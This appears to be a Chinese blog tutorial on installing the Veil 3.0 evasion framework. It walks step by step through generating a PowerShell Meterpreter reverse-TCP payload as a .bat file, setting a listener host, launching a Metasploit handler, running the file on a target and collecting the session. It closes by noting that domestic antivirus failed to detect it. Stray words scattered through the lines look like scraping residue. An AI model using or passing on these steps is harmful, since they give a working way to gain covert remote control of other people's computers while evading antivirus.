最新的Veil3.0的安裝和使用

首先安裝python

┌─[root@sch01ar]─[~]
└──╼ #cd /sch01ar/Veil/
┌─[root@sch01ar]─[/sch01ar/Veil]
└──╼ #cd setup/
┌─[root@sch01ar]─[/sch01ar/Veil/setup]
└──╼ #./setup.sh -c

 

 在安裝過程當中,可能會有一處須要輸入msf地址的shell

安裝完成bash

若是veil在運行的時候有什麼錯誤,可使用命令刪除再運行session

┌─[root@sch01ar]─[~]
└──╼ #rm -rf /root/.config/wine/veil
┌─[root@sch01ar]─[~]
└──╼ #/sch01ar/Veil/setup/setup.sh -c

給Veil權限並打開文件夾tcp

┌─[root@sch01ar]─[/sch01ar]
└──╼ #chmod +x Veil/
┌─[root@sch01ar]─[/sch01ar]
└──╼ #cd Veil/

 若是用python命令打開則會報錯工具

┌─[root@sch01ar]─[/sch01ar/Veil]
└──╼ #python Veil.py

 

打開veil3d

┌─[root@sch01ar]─[/sch01ar/Veil]
└──╼ #./Veil.py

 

輸入list查看工具列表blog

能夠直接回車io

選擇1console

回車

輸入list查看payload列表

選擇22,回車

Veil-Evasion command: use 22

 

設置LHOST

[powershell/meterpreter/rev_tcp>>] set LHOST 192.168.220.134

 生成

[powershell/meterpreter/rev_tcp>>] generate

 

輸入文件名稱

回車

生成了一個bat文件和msf模塊

bat文件目錄爲

/usr/share/veil-output/source/sch01ar.bat

 msf模塊地址

/usr/share/veil-output/handlers/sch01ar.rc

 開啓msf監聽

┌─[root@sch01ar]─[~]
└──╼ #msfconsole -r /usr/share/veil-output/handlers/sch01ar.rc

 

在目標主機運行bat文件,攻擊主機獲得反彈的目標主機

輸入sessions查看會話

病毒掃描結果

國內的殺軟都沒有檢測出來

相關文章
相關標籤/搜索